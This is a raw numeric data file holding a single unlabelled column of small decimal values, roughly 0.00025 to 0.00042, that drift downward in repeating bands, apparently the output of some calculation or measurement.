0.000411864
0.000411875
0.000407597
0.000411873
0.000411856
0.000407608
0.000407596
0.000411857
0.000411872
0.000407594
0.000416381
0.000420661
0.000416389
0.000420663
0.000416381
0.000416381
0.0004164
0.000420642
0.00042066
0.000420662
0.000416394
0.000416384
0.000411872
0.000407594
0.000411862
0.00041187
0.000407594
0.000398813
0.000403073
0.000403088
0.000398827
0.00040309
0.000398825
0.000398814
0.000394306
0.000394295
0.000390027
0.000394305
0.000390029
0.000398812
0.00040309
0.000398822
0.00040309
0.000398812
0.000394307
0.000394289
0.000390042
0.000390033
0.000394289
0.000394306
0.000390031
0.000398808
0.000403068
0.000403085
0.000398829
0.000403085
0.000398825
0.000398812
0.000394304
0.000394294
0.000390028
0.000394304
0.000390028
0.00039881
0.000403088
0.000398822
0.000403087
0.000398813
0.000394302
0.000394288
0.000390042
0.000390031
0.000394286
0.000394303
0.000390027
0.00041639
0.000411871
0.000416386
0.000411868
0.000398805
0.000403093
0.000403093
0.000403095
0.000398808
0.000398808
0.000394271
0.000390097
0.000394299
0.00039004
0.000390065
0.000394238
0.000394295
0.00039427
0.000390098
0.000394297
0.000390037
0.000390065
0.000394237
0.000394294
0.000398849
0.000403079
0.000403016
0.00039882
0.000403051
0.000398882
0.000398823
0.000398848
0.000403078
0.000403013
0.00039882
0.000403051
0.000398879
0.000398822
0.000394312
0.000390025
0.000390024
0.000390022
0.000394309
0.000394308
0.000394301
0.000398816
0.000394299
0.000398816
0.000381247
0.00037673
0.000381246
0.000376729
0.000376742
0.000372455
0.000372454
0.000376739
0.000376739
0.000372452
0.000381278
0.00038545
0.000385509
0.00038125
0.000385484
0.000381253
0.00038131
0.000381277
0.000385446
0.00038551
0.00038125
0.000385484
0.000381253
0.000381308
0.000381236
0.000385524
0.000385525
0.000385527
0.000381239
0.00038124
0.000376699
0.000372469
0.000376727
0.000372524
0.000376725
0.000372493
0.000376665
0.000376698
0.000372467
0.000376726
0.000372526
0.000376725
0.000372493
0.000376664
0.000359161
0.000363677
0.00035916
0.000363676
0.000363666
0.000367955
0.000367954
0.000367958
0.000363669
0.000363669
0.00035913
0.000354954
0.000359159
0.000354898
0.000359155
0.000359096
0.00035492
0.00035913
0.000354957
0.000359158
0.000354896
0.000359153
0.000359099
0.00035492
0.000363711
0.000367941
0.000367875
0.000363681
0.000367915
0.000363684
0.000363741
0.000363711
0.000367939
0.000367877
0.00036368
0.000367914
0.000363682
0.000363743
0.000359171
0.000354883
0.000354883
0.000359169
0.000359168
0.000354879
0.000376734
0.000376718
0.000372459
0.000372472
0.000376733
0.000376722
0.000372458
0.00038124
0.000385517
0.000381251
0.000385518
0.00038124
0.00038124
0.00038126
0.000385516
0.000385502
0.000381243
0.000385518
0.000381257
0.000376733
0.000372456
0.000376724
0.000376733
0.000372457
0.000363672
0.000367947
0.000367932
0.000363688
0.000367949
0.000363674
0.000363687
0.000359166
0.000359155
0.000354887
0.000354888
0.000359165
0.000363671
0.000367948
0.000363681
0.000367949
0.000363672
0.000359166
0.000359147
0.00035489
0.000354901
0.000354888
0.000359164
0.00035915
0.000363673
0.000367949
0.000367933
0.000363693
0.000367951
0.000363676
0.000363689
0.000359165
0.000359156
0.000354886
0.000359165
0.000354886
0.000363671
0.000367949
0.000363681
0.000367949
0.000363673
0.000359166
0.000359149
0.000354891
0.000354902
0.000359165
0.000359153
0.000354888
0.000376742
0.000372454
0.000372455
0.000376739
0.000376738
0.000372451
0.000381279
0.000385446
0.00038551
0.00038125
0.000381254
0.000385484
0.000381311
0.000381279
0.000385447
0.00038551
0.00038125
0.000381312
0.000385483
0.000381253
0.000381236
0.000385525
0.000385525
0.000381239
0.000385528
0.000381239
0.000376698
0.000372468
0.000376726
0.000372527
0.000376725
0.000376667
0.000372492
0.000376699
0.000372469
0.000376727
0.000372526
0.000376667
0.000376724
0.000372493
0.000381246
0.00037673
0.000359161
0.000363676
0.000363668
0.000367955
0.000367956
0.000367959
0.00036367
0.000363671
0.000359132
0.000354957
0.000359159
0.000354897
0.000359097
0.000359155
0.000354924
0.000359132
0.000354956
0.000359159
0.000354898
0.000359156
0.000359096
0.000354922
0.000363712
0.000367939
0.000367876
0.000363681
0.000363742
0.000367913
0.000363684
0.000363712
0.000367942
0.000367874
0.000363684
0.000367915
0.000363686
0.00036374
0.000359173
0.000354883
0.000354883
0.000359169
0.00035917
0.000354879
0.000359162
0.000363679
0.000376739
0.000376721
0.000372463
0.000372475
0.000376737
0.000376724
0.000372463
0.000381246
0.000385522
0.000381256
0.000385524
0.000381246
0.000381246
0.000381265
0.000385522
0.000385506
0.000381248
0.000385523
0.000381261
0.000376741
0.000372463
0.00037673
0.00037674
0.000372463
0.000363675
0.000367934
0.000367952
0.000363693
0.000367952
0.000363688
0.000363678
0.000359167
0.000359155
0.000354887
0.000354889
0.000359166
0.000363673
0.000367949
0.000363681
0.000367951
0.000363673
0.000359168
0.00035915
0.000354899
0.000354892
0.000354889
0.000359151
0.000359167
0.000363676
0.000367952
0.000367936
0.000363692
0.000367954
0.000363678
0.00036369
0.00035917
0.000359158
0.000354891
0.000359168
0.000354893
0.000363677
0.000367953
0.000363685
0.000367955
0.000363677
0.000359169
0.000359149
0.000354893
0.000354905
0.000359167
0.000359153
0.000354892
0.000376733
0.000376719
0.000372473
0.000372462
0.00037672
0.000376734
0.000372458
0.00038124
0.000385519
0.000381251
0.00038124
0.00038552
0.000381239
0.00038126
0.000385504
0.000385518
0.000381255
0.000385519
0.000381244
0.000376733
0.000372456
0.000376724
0.000376732
0.000372457
0.000376737
0.000376724
0.000372461
0.000372477
0.000376735
0.000376725
0.00037246
0.000381243
0.000385517
0.000381254
0.00038552
0.000381242
0.000381242
0.000381266
0.00038552
0.000385504
0.000385519
0.000381246
0.00038126
0.000376738
0.000372462
0.000376727
0.000376738
0.000372462
0.000363674
0.000367935
0.000367951
0.000363693
0.000367951
0.000363689
0.000363677
0.00035917
0.000359156
0.000354892
0.000359169
0.000354894
0.000363674
0.00036795
0.000363683
0.000367951
0.000363674
0.000359169
0.000359153
0.000354907
0.000354895
0.000359155
0.000359168
0.000354894
0.000363675
0.00036795
0.000367939
0.000363693
0.000367952
0.000363677
0.00036369
0.000359171
0.00035916
0.000354892
0.000359171
0.000354894
0.000363677
0.000367955
0.000363687
0.000367955
0.000363677
0.000359168
0.000359152
0.000354894
0.000354905
0.000359167
0.000359153
0.000354891
0.000376742
0.000372456
0.000372455
0.000376739
0.000376739
0.000372453
0.00038128
0.000385448
0.00038551
0.000381253
0.000381254
0.000385483
0.000381314
0.000381279
0.000385446
0.000385509
0.00038125
0.000381309
0.000385482
0.000381253
0.000381235
0.000385524
0.000385524
0.000381239
0.000385526
0.000381239
0.0003767
0.00037247
0.00037673
0.00037253
0.000376725
0.000376671
0.000372495
0.000376699
0.000372469
0.000376728
0.000372525
0.000376665
0.000376724
0.000372494
0.000381247
0.000376729
0.000359163
0.000363679
0.000363669
0.000367957
0.000367957
0.00036796
0.000363672
0.000363672
0.000359134
0.000354958
0.000359162
0.000354902
0.000359099
0.000359158
0.000354926
0.000359135
0.000354959
0.000359163
0.000354902
0.000359158
0.000359101
0.000354927
0.000363713
0.000367943
0.000367878
0.000363684
0.000363745
0.000367917
0.000363686
0.000363714
0.000367942
0.000367877
0.000363683
0.000367916
0.000363686
0.000363744
0.000359176
0.000354887
0.000354887
0.000359172
0.000359172
0.000354884
0.000359164
0.000363679
0.000376737
0.000376717
0.000372474
0.000372462
0.000376721
0.000376735
0.000372461
0.000381242
0.000385519
0.000381252
0.000381242
0.000385521
0.000381243
0.000381263
0.000385504
0.000385522
0.000381258
0.000385522
0.000381246
0.000376736
0.000372458
0.000376724
0.000376735
0.000372459
0.000376738
0.00037672
0.000372475
0.000372464
0.000376723
0.000376737
0.000372461
0.000381244
0.00038552
0.000381253
0.000385522
0.000381244
0.000381244
0.000381264
0.000385503
0.000385521
0.000385521
0.000381261
0.000381248
0.000376738
0.000372458
0.000376726
0.000376736
0.00037246
0.000363673
0.000367937
0.00036795
0.000363695
0.000367952
0.00036369
0.000363676
0.000359169
0.000359158
0.000354892
0.000359169
0.000354891
0.000363674
0.000367951
0.000363684
0.000367952
0.000363675
0.000359167
0.000359153
0.000354907
0.000354893
0.000359153
0.000359166
0.000354891
0.000363677
0.000367936
0.000367953
0.000363694
0.000367954
0.000363692
0.000363677
0.000359172
0.00035916
0.000354893
0.000359171
0.000354893
0.000363678
0.000367952
0.000363686
0.000367954
0.000363678
0.00035917
0.000359149
0.000354907
0.000354892
0.000359155
0.000359165
0.000354893
0.00038125
0.000376734
0.000381247
0.000376731
0.000363672
0.000367958
0.000367959
0.000367961
0.000363674
0.000363675
0.000359134
0.000354961
0.000359163
0.000354901
0.000354925
0.0003591
0.000359159
0.000359134
0.00035496
0.000359163
0.000354902
0.000354926
0.0003591
0.00035916
0.000363714
0.000367943
0.000367879
0.000363685
0.000367916
0.000363744
0.000363688
0.000363714
0.000367944
0.000367877
0.000363685
0.000367917
0.000363742
0.000363689
0.000359177
0.000354886
0.000354887
0.000354883
0.000359173
0.000359174
0.000359165
0.000363681
0.000359165
0.000363681
0.000346107
0.000341592
0.000346109
0.000341594
0.000341604
0.000337318
0.000337318
0.000341601
0.000341601
0.000337315
0.00034614
0.000350305
0.000350369
0.000346112
0.000350341
0.000346113
0.000346173
0.00034614
0.000350308
0.000350368
0.000346113
0.000350341
0.000346114
0.000346172
0.000346096
0.000350383
0.000350383
0.000350386
0.000346099
0.000346099
0.000341562
0.000337333
0.000341591
0.00033739
0.000341587
0.000337356
0.000341531
0.000341562
0.000337332
0.000341593
0.000337388
0.000341587
0.000337356
0.000341528
0.000324028
0.000328543
0.000324025
0.000328541
0.000328531
0.000332819
0.000332819
0.000332822
0.000328534
0.000328534
0.000323994
0.000319821
0.000324025
0.000319764
0.000324021
0.000323961
0.000319788
0.000323993
0.000319821
0.000324023
0.000319765
0.000324021
0.000323962
0.000319787
0.000328574
0.000332805
0.00033274
0.000328546
0.000332778
0.000328548
0.000328606
0.000328575
0.000332804
0.000332739
0.000328545
0.000332778
0.000328547
0.000328607
0.000324038
0.00031975
0.00031975
0.000324035
0.000324034
0.000319747
0.000341598
0.000341584
0.000337325
0.000337339
0.000341597
0.000341586
0.000337324
0.000346102
0.000350379
0.000346115
0.000350379
0.000346104
0.000346103
0.000346124
0.000350382
0.000350364
0.000346107
0.00035038
0.00034612
0.000341598
0.000337324
0.000341589
0.000341598
0.000337324
0.000328541
0.000332817
0.000332798
0.00032856
0.000332817
0.000328544
0.000328555
0.000324035
0.000324023
0.000319756
0.000319757
0.000324033
0.000328541
0.000332817
0.000328549
0.000332818
0.000328542
0.000324035
0.000324018
0.000319759
0.000319772
0.000319759
0.000324033
0.00032402
0.00032854
0.000332815
0.000332801
0.000328559
0.000332817
0.000328543
0.000328555
0.000324036
0.000324023
0.000319757
0.000324035
0.000319758
0.000328542
0.000332818
0.00032855
0.000332818
0.000328542
0.000324034
0.000324018
0.000319757
0.00031977
0.000324032
0.00032402
0.000319756
0.000341604
0.00033732
0.000337319
0.000341602
0.000341602
0.000337317
0.000346139
0.000350307
0.00035037
0.000346112
0.000346114
0.000350342
0.000346173
0.00034614
0.000350308
0.000350369
0.000346113
0.000346172
0.000350342
0.000346114
0.000346096
0.000350384
0.000350383
0.0003461
0.000350386
0.0003461
0.000341561
0.000337335
0.00034159
0.00033739
0.000341587
0.00034153
0.000337358
0.000341561
0.000337333
0.000341589
0.000337389
0.000341528
0.000341587
0.000337356
0.000346108
0.000341592
0.000324027
0.000328544
0.000328532
0.000332821
0.00033282
0.000332824
0.000328535
0.000328535
0.000323996
0.000319821
0.000324025
0.000319765
0.000323961
0.000324021
0.000319789
0.000323996
0.000319822
0.000324025
0.000319766
0.000324021
0.000323962
0.000319788
0.000328575
0.000332808
0.00033274
0.000328546
0.000328607
0.000332779
0.00032855
0.000328576
0.000332805
0.000332739
0.000328547
0.000332779
0.000328548
0.000328607
0.000324038
0.000319751
0.000319751
0.000324035
0.000324035
0.000319748
0.000324027
0.000328542
0.0003416
0.000341581
0.000337324
0.000337337
0.000341598
0.000341584
0.000337324
0.000346108
0.000350383
0.000346115
0.000350386
0.000346108
0.000346107
0.000346122
0.000350383
0.000350366
0.000346108
0.000350384
0.000346121
0.000341601
0.000337322
0.000341588
0.000341598
0.000337323
0.000328538
0.000332795
0.000332812
0.000328553
0.000332814
0.000328552
0.00032854
0.000324035
0.000324022
0.000319755
0.000319757
0.000324034
0.000328538
0.000332813
0.000328548
0.000332815
0.000328538
0.000324034
0.000324014
0.000319771
0.000319758
0.000319758
0.000324019
0.000324031
0.000328539
0.000332813
0.000332798
0.000328555
0.000332816
0.00032854
0.000328554
0.000324034
0.000324022
0.000319757
0.000324033
0.000319756
0.000328538
0.000332814
0.000328549
0.000332816
0.000328539
0.000324033
0.000324013
0.000319757
0.00031977
0.000324031
0.000324017
0.000319757
0.000341603
0.00034158
0.000337336
0.000337324
0.000341585
0.000341598
0.000337324
0.000346109
0.000350384
0.000346115
0.000346108
0.000350387
0.00034611
0.000346125
0.000350368
0.000350385
0.000346121
0.000350387
0.00034611
0.0003416
0.000337321
0.000341587
0.000341599
0.000337323
0.000341598
0.000341579
0.000337324
0.000337334
0.000341598
0.000341583
0.000337322
0.000346105
0.000350383
0.000346114
0.000350385
0.000346104
0.000346104
0.000346121
0.000350383
0.000350365
0.000350382
0.000346108
0.000346117
0.000341599
0.000337319
0.000341588
0.000341597
0.000337321
0.000328538
0.000332799
0.000332814
0.000328554
0.000332816
0.000328552
0.000328541
0.000324032
0.000324022
0.000319755
0.000324032
0.000319756
0.000328537
0.000332814
0.000328547
0.000332815
0.000328538
0.000324033
0.000324015
0.000319771
0.000319759
0.000324017
0.000324031
0.000319757
0.000328538
0.000332814
0.000332796
0.000328557
0.000332814
0.000328542
0.000328552
0.000324033
0.000324022
0.000319755
0.000324031
0.000319757
0.000328537
0.00033281
0.000328547
0.000332813
0.000328536
0.000324033
0.000324017
0.000319759
0.00031977
0.000324032
0.000324017
0.000319757
0.000341605
0.000337318
0.000337319
0.000341602
0.000341602
0.000337315
0.000346142
0.000350308
0.000350372
0.000346114
0.000346115
0.000350346
0.000346173
0.000346143
0.00035031
0.000350373
0.000346115
0.000346174
0.000350347
0.000346117
0.000346098
0.000350387
0.000350388
0.000346102
0.00035039
0.000346102
0.00034156
0.000337332
0.00034159
0.00033739
0.000341586
0.000341528
0.000337355
0.000341562
0.000337334
0.000341594
0.00033739
0.000341529
0.000341589
0.000337356
0.00034611
0.000341595
0.000324027
0.000328543
0.000328533
0.000332819
0.00033282
0.000332823
0.000328535
0.000328535
0.000323996
0.000319821
0.000324025
0.000319763
0.00032396
0.000324021
0.000319789
0.000323996
0.000319823
0.000324025
0.000319763
0.00032402
0.000323963
0.000319789
0.000328575
0.000332805
0.00033274
0.000328547
0.000328607
0.000332777
0.000328549
0.000328575
0.000332806
0.000332742
0.000328547
0.000332777
0.000328549
0.000328608
0.000324038
0.000319749
0.000319749
0.000324035
0.000324034
0.000319746
0.000324028
0.000328543
0.0003416
0.000341583
0.00033734
0.000337326
0.000341588
0.0003416
0.000337324
0.000346107
0.000350383
0.000346117
0.000346107
0.000350384
0.000346105
0.000346127
0.000350367
0.000350383
0.000346123
0.000350382
0.00034611
0.000341602
0.000337325
0.000341591
0.000341603
0.000337325
0.000341601
0.000341584
0.000337338
0.000337327
0.000341584
0.0003416
0.000337325
0.000346108
0.000350383
0.000346117
0.000350385
0.000346107
0.000346108
0.000346127
0.000350368
0.000350383
0.000350385
0.000346124
0.00034611
0.000341602
0.000337324
0.00034159
0.0003416
0.000337325
0.000328539
0.0003328
0.000332815
0.000328555
0.000332816
0.000328555
0.000328541
0.000324034
0.000324023
0.000319756
0.000324033
0.000319757
0.000328539
0.000332816
0.000328549
0.000332817
0.00032854
0.000324032
0.000324013
0.000319769
0.000319759
0.000324017
0.00032403
0.000319756
0.000328542
0.000332798
0.000332817
0.000328558
0.000332817
0.000328556
0.000328543
0.000324035
0.000324024
0.000319758
0.000324034
0.000319758
0.00032854
0.000332816
0.000328551
0.000332818
0.000328541
0.000324036
0.000324014
0.000319773
0.00031976
0.000324018
0.000324032
0.00031976
0.00034611
0.000341593
0.000346113
0.000341596
0.000328535
0.000332821
0.000332822
0.000332824
0.000328537
0.000328538
0.000323999
0.000319823
0.000324026
0.000319766
0.000319792
0.000323963
0.000324023
0.000323999
0.000319825
0.000324027
0.000319767
0.000319793
0.000323965
0.000324024
0.000328577
0.000332806
0.00033274
0.000328547
0.000332778
0.000328607
0.00032855
0.000328577
0.000332807
0.000332741
0.000328548
0.000332778
0.000328608
0.000328552
0.000324041
0.000319752
0.000319752
0.000319749
0.000324037
0.000324037
0.000324028
0.000328542
0.000324028
0.000328543
0.000310975
0.00030646
0.000310974
0.000306458
0.000306469
0.000302183
0.000302182
0.000306466
0.000306465
0.000302179
0.000311006
0.000315174
0.000315234
0.000310978
0.000315209
0.000310979
0.00031104
0.000311006
0.000315172
0.000315237
0.000310978
0.000315208
0.00031098
0.000311038
0.000310962
0.000315249
0.00031525
0.000315252
0.000310965
0.000310965
0.000306429
0.000302197
0.000306457
0.000302256
0.000306453
0.000302223
0.000306397
0.000306429
0.000302196
0.000306455
0.000302254
0.000306451
0.000302222
0.000306394
0.000288893
0.000293408
0.000288893
0.000293408
0.000293397
0.000297684
0.000297683
0.000297686
0.0002934
0.0002934
0.000288861
0.000284687
0.000288891
0.000284632
0.000288887
0.000288827
0.000284655
0.000288861
0.000284688
0.000288889
0.000284632
0.000288887
0.000288828
0.000284655
0.00029344
0.000297669
0.000297604
0.000293411
0.000297643
0.000293414
0.000293472
0.00029344
0.000297668
0.000297604
0.000293411
0.000297642
0.000293414
0.000293473
0.000288904
0.000284617
0.000284617
0.000288901
0.000288901
0.000284614
0.000306465
0.000306443
0.00030219
0.000302201
0.000306463
0.000306447
0.00030219
0.000310971
0.000315246
0.000310978
0.000315248
0.00031097
0.00031097
0.000310988
0.000315246
0.000315227
0.000310974
0.000315246
0.000310983
0.000306467
0.000302187
0.000306452
0.000306463
0.00030219
0.000293404
0.000297679
0.000297661
0.000293421
0.00029768
0.000293406
0.000293418
0.000288899
0.000288887
0.000284621
0.000284622
0.000288897
0.000293404
0.000297679
0.000293414
0.000297681
0.000293406
0.000288898
0.00028888
0.000284625
0.000284635
0.000284623
0.000288897
0.000288881
0.000293405
0.00029768
0.000297663
0.000293422
0.000297682
0.000293407
0.00029342
0.000288899
0.00028889
0.000284623
0.000288898
0.000284623
0.000293404
0.00029768
0.000293416
0.000297682
0.000293405
0.0002889
0.000288881
0.000284625
0.000284639
0.000288897
0.000288886
0.000284624
0.00030647
0.000302184
0.000302185
0.000306467
0.000306468
0.000302181
0.000311008
0.000315174
0.000315236
0.000310979
0.000310981
0.000315208
0.000311041
0.000311008
0.000315174
0.000315237
0.000310982
0.00031104
0.000315207
0.000310982
0.000310964
0.000315251
0.000315252
0.000310966
0.000315254
0.000310967
0.00030643
0.000302197
0.000306456
0.00030226
0.000306452
0.000306397
0.000302224
0.00030643
0.0003022
0.000306459
0.000302259
0.000306397
0.000306454
0.000302225
0.000310977
0.000306462
0.000288895
0.00029341
0.000293401
0.000297685
0.000297687
0.000297689
0.000293403
0.000293404
0.000288865
0.000284692
0.000288892
0.000284634
0.000288831
0.000288889
0.000284659
0.000288868
0.000284694
0.000288896
0.000284636
0.000288891
0.000288833
0.000284661
0.000293445
0.00029767
0.000297608
0.000293415
0.000293476
0.000297645
0.000293416
0.000293447
0.000297673
0.00029761
0.000293419
0.000297646
0.000293419
0.000293479
0.000288907
0.00028462
0.000284621
0.000288904
0.000288905
0.000284617
0.000288898
0.000293413
0.000306463
0.000306451
0.000302189
0.000302201
0.000306463
0.000306449
0.000302186
0.000310969
0.000315245
0.000310979
0.000315248
0.00031097
0.00031097
0.000310991
0.000315248
0.000315231
0.000310974
0.000315247
0.000310987
0.000306463
0.000302187
0.000306452
0.000306462
0.000302186
0.000293406
0.000297662
0.00029768
0.000293422
0.000297682
0.00029342
0.000293408
0.000288902
0.000288889
0.000284624
0.000284625
0.000288901
0.000293406
0.00029768
0.000293415
0.000297682
0.000293406
0.000288902
0.000288884
0.000284639
0.000284626
0.000284626
0.000288885
0.000288899
0.000293403
0.000297679
0.000297663
0.000293426
0.000297678
0.000293408
0.000293421
0.000288898
0.000288886
0.00028462
0.000288896
0.00028462
0.000293403
0.000297678
0.000293414
0.000297679
0.000293404
0.000288897
0.000288882
0.000284624
0.000284637
0.000288897
0.000288883
0.000284622
0.000306468
0.000306451
0.000302207
0.000302195
0.000306451
0.000306466
0.000302195
0.000310972
0.000315245
0.000310982
0.000310971
0.000315248
0.000310971
0.00031099
0.000315229
0.000315247
0.000310985
0.000315248
0.000310973
0.000306469
0.000302195
0.000306456
0.000306467
0.000302196
0.000306469
0.00030645
0.000302194
0.000302206
0.000306466
0.000306454
0.000302193
0.000310974
0.000315248
0.000310981
0.00031525
0.000310974
0.000310973
0.000310989
0.000315248
0.000315231
0.000315249
0.000310974
0.000310988
0.00030647
0.000302193
0.000306455
0.000306468
0.000302193
0.000293414
0.000297669
0.000297687
0.000293428
0.000297689
0.000293427
0.000293416
0.000288909
0.000288896
0.00028463
0.000288908
0.00028463
0.000293414
0.000297689
0.000293422
0.000297691
0.000293415
0.000288908
0.000288888
0.000284645
0.00028463
0.000288893
0.000288904
0.000284631
0.000293409
0.000297684
0.000297667
0.000293424
0.000297685
0.000293412
0.000293422
0.000288904
0.000288892
0.000284625
0.000288902
0.000284627
0.000293408
0.000297684
0.000293418
0.000297686
0.000293408
0.000288904
0.000288885
0.00028463
0.000284642
0.000288902
0.000288888
0.000284629
0.000306468
0.000302181
0.000302181
0.000306465
0.000306465
0.000302178
0.000311004
0.000315172
0.000315233
0.000310976
0.000310978
0.000315207
0.000311037
0.000311005
0.000315174
0.000315234
0.000310978
0.000311037
0.000315208
0.000310979
0.000310961
0.000315248
0.000315249
0.000310964
0.000315251
0.000310964
0.000306425
0.000302196
0.000306455
0.000302253
0.000306451
0.000306391
0.000302219
0.000306425
0.000302194
0.000306456
0.000302255
0.000306392
0.00030645
0.00030222
0.000310973
0.000306458
0.000288891
0.000293407
0.000293397
0.000297682
0.000297683
0.000297685
0.000293399
0.0002934
0.000288863
0.000284687
0.000288889
0.000284631
0.000288827
0.000288886
0.000284655
0.000288864
0.00028469
0.000288894
0.000284633
0.000288887
0.00028883
0.000284656
0.000293442
0.000297668
0.000297604
0.000293412
0.000293473
0.000297641
0.000293414
0.000293442
0.000297668
0.000297607
0.000293414
0.000297642
0.000293414
0.000293475
0.000288903
0.000284616
0.000284618
0.0002889
0.000288901
0.000284614
0.000288898
0.000293411
0.000306466
0.000306449
0.000302205
0.000302193
0.00030645
0.000306465
0.000302191
0.000310972
0.000315247
0.00031098
0.000310971
0.00031525
0.000310972
0.000310991
0.00031523
0.000315249
0.000310986
0.000315248
0.000310975
0.000306467
0.000302189
0.000306453
0.000306465
0.000302191
0.000306467
0.000306448
0.000302205
0.000302191
0.00030645
0.000306465
0.000302191
0.000310973
0.000315249
0.000310984
0.000315251
0.000310974
0.000310974
0.000310992
0.000315233
0.00031525
0.000315251
0.000310989
0.000310975
0.000306468
0.00030219
0.000306456
0.000306466
0.000302191
0.000293411
0.000297668
0.000297684
0.000293429
0.000297685
0.000293425
0.000293413
0.000288907
0.000288894
0.00028463
0.000288906
0.000284631
0.000293411
0.000297684
0.000293418
0.000297687
0.000293411
0.000288906
0.000288886
0.000284645
0.000284632
0.00028889
0.000288903
0.000284631
0.00029341
0.000297667
0.000297682
0.000293428
0.000297685
0.000293426
0.000293411
0.000288904
0.000288892
0.000284629
0.000288902
0.000284627
0.000293409
0.000297683
0.000293418
0.000297685
0.00029341
0.000288903
0.000288886
0.000284645
0.000284632
0.000288888
0.000288902
0.000284628
0.000310975
0.00030646
0.000310977
0.00030646
0.000293401
0.000297688
0.000297687
0.00029769
0.000293404
0.000293404
0.000288867
0.000284694
0.000288895
0.000284635
0.000284661
0.000288832
0.000288891
0.000288867
0.000284695
0.000288894
0.000284635
0.000284661
0.000288832
0.000288891
0.000293445
0.000297674
0.000297605
0.000293418
0.000297644
0.000293474
0.000293419
0.000293445
0.000297673
0.000297606
0.000293416
0.000297644
0.000293474
0.000293418
0.000288907
0.00028462
0.00028462
0.000284617
0.000288905
0.000288904
0.000288898
0.000293413
0.000288898
0.000293414
0.000275847
0.000271332
0.000275843
0.000271327
0.000271339
0.000267055
0.000267054
0.000271337
0.000271336
0.000267051
0.000275876
0.00028004
0.000280104
0.000275849
0.000280076
0.00027585
0.000275907
0.000275876
0.00028004
0.000280105
0.000275846
0.000280077
0.000275849
0.000275907
0.000275832
0.000280118
0.000280118
0.00028012
0.000275835
0.000275834
0.000271298
0.000267069
0.000271328
0.000267126
0.000271323
0.000267094
0.000271264
0.000271298
0.000267068
0.000271324
0.000267126
0.000271321
0.000267093
0.000271264
0.000253769
0.000258283
0.000253766
0.00025828
0.000258271
0.000262557
0.000262556
0.000262559
0.000258274
0.000258273
0.000253737
0.000249566
0.000253766
0.000249508
0.000253762
0.000253705
0.000249532
0.000253737
0.000249564
0.000253764
0.000249507
0.00025376
0.000253704
0.000249532
0.000258317
0.000262542
0.000262477
0.000258288
0.000262516
0.000258289
0.000258349
0.000258316
0.000262541
0.000262476
0.000258285
0.000262514
0.000258287
0.000258348
0.000253777
0.000249493
0.000249492
0.000253776
0.000253774
0.000249489
0.000271337
0.000271321
0.000267066
0.000267077
0.000271337
0.000271322
0.000267063
0.000275839
0.000280114
0.00027585
0.000280116
0.00027584
0.000275841
0.000275861
0.000280116
0.000280096
0.000275845
0.000280116
0.000275855
0.000271337
0.00026706
0.000271325
0.000271335
0.000267061
0.000258279
0.000262555
0.000262537
0.000258302
0.000262554
0.000258283
0.000258297
0.000253777
0.000253765
0.000249503
0.0002495
0.000253776
0.00025828
0.000262555
0.00025829
0.000262557
0.000258283
0.000253774
0.000253761
0.000249501
0.000249517
0.0002495
0.000253773
0.000253761
0.000258281
0.000262555
0.000262539
0.0002583
0.000262556
0.000258282
0.000258297
0.000253776
0.000253764
0.000249501
0.000253774
0.0002495
0.000258279
0.000262552
0.00025829
0.000262555
0.000258281
0.000253775
0.000253759
0.0002495
0.000249517
0.000253771
0.000253759
0.000249501
0.000271342
0.000267057
0.000267056
0.000271339
0.000271338
0.000267053
0.000275879
0.000280043
0.000280106
0.00027585
0.000275852
0.000280079
0.00027591
0.000275878
0.000280045
0.000280106
0.000275848
0.00027591
0.000280079
0.000275852
0.000275835
0.000280121
0.000280121
0.000275838
0.000280123
0.000275837
0.0002713
0.000267071
0.000271328
0.000267128
0.000271325
0.000271265
0.000267096
0.000271299
0.000267069
0.000271326
0.000267129
0.000271265
0.000271324
0.000267095
0.000275844
0.000271329
0.00025377
0.000258284
0.000258275
0.000262559
0.000262558
0.000262561
0.000258277
0.000258276
0.000253741
0.000249567
0.000253768
0.000249511
0.000253704
0.000253765
0.000249535
0.00025374
0.000249569
0.000253766
0.000249507
0.000253762
0.000253705
0.000249534
0.000258319
0.000262545
0.000262477
0.00025829
0.000258349
0.000262517
0.000258292
0.000258318
0.000262543
0.000262478
0.000258289
0.000262516
0.00025829
0.000258349
0.000253781
0.000249495
0.000249493
0.000253778
0.000253777
0.000249491
0.000253769
0.000258283
0.000271332
0.000271316
0.000267059
0.000267071
0.00027133
0.000271316
0.000267057
0.000275837
0.000280114
0.000275849
0.000280115
0.00027584
0.000275838
0.000275857
0.000280113
0.000280097
0.000275839
0.000280114
0.000275855
0.000271332
0.000267056
0.000271321
0.00027133
0.000267056
0.000258276
0.000262533
0.000262549
0.000258294
0.000262551
0.000258292
0.000258278
0.000253772
0.000253761
0.000249494
0.000249494
0.000253771
0.000258276
0.000262549
0.000258286
0.000262552
0.000258278
0.000253771
0.000253751
0.000249511
0.000249498
0.000249496
0.000253757
0.000253769
0.000258275
0.000262549
0.00026253
0.000258292
0.00026255
0.000258277
0.000258289
0.000253771
0.000253757
0.000249495
0.000253767
0.000249495
0.000258274
0.000262549
0.000258284
0.000262552
0.000258276
0.00025377
0.000253752
0.000249498
0.000249511
0.000253768
0.000253752
0.000249497
0.000271338
0.000271321
0.000267075
0.000267063
0.000271323
0.000271336
0.000267062
0.000275843
0.000280118
0.00027585
0.000275843
0.000280121
0.000275844
0.000275864
0.000280103
0.000280119
0.000275858
0.000280121
0.000275847
0.000271339
0.000267062
0.000271324
0.000271337
0.000267061
0.000271339
0.000271325
0.000267064
0.000267076
0.000271338
0.000271325
0.000267062
0.000275844
0.000280118
0.000275854
0.000280121
0.000275845
0.000275845
0.000275867
0.00028012
0.000280103
0.000280121
0.000275848
0.000275862
0.000271339
0.000267061
0.000271326
0.000271337
0.000267061
0.00025828
0.000262532
0.000262553
0.000258297
0.000262553
0.000258294
0.000258283
0.000253776
0.000253763
0.000249499
0.000253774
0.000249499
0.000258278
0.000262553
0.000258288
0.000262555
0.00025828
0.000253776
0.000253757
0.000249517
0.000249502
0.00025376
0.000253774
0.000249501
0.000258278
0.000262553
0.000262535
0.000258296
0.000262554
0.000258282
0.000258292
0.000253774
0.000253761
0.000249499
0.000253773
0.000249498
0.000258277
0.000262552
0.000258287
0.000262555
0.000258279
0.000253772
0.000253753
0.000249501
0.000249512
0.000253772
0.000253753
0.000249499
0.000271337
0.000267051
0.000267053
0.000271334
0.000271336
0.000267049
0.000275874
0.000280039
0.000280102
0.000275846
0.000275847
0.000280075
0.000275907
0.000275875
0.00028004
0.000280105
0.000275851
0.000275905
0.000280076
0.000275851
0.000275831
0.000280117
0.000280119
0.000275833
0.00028012
0.000275835
0.000271292
0.000267065
0.000271322
0.000267124
0.000271319
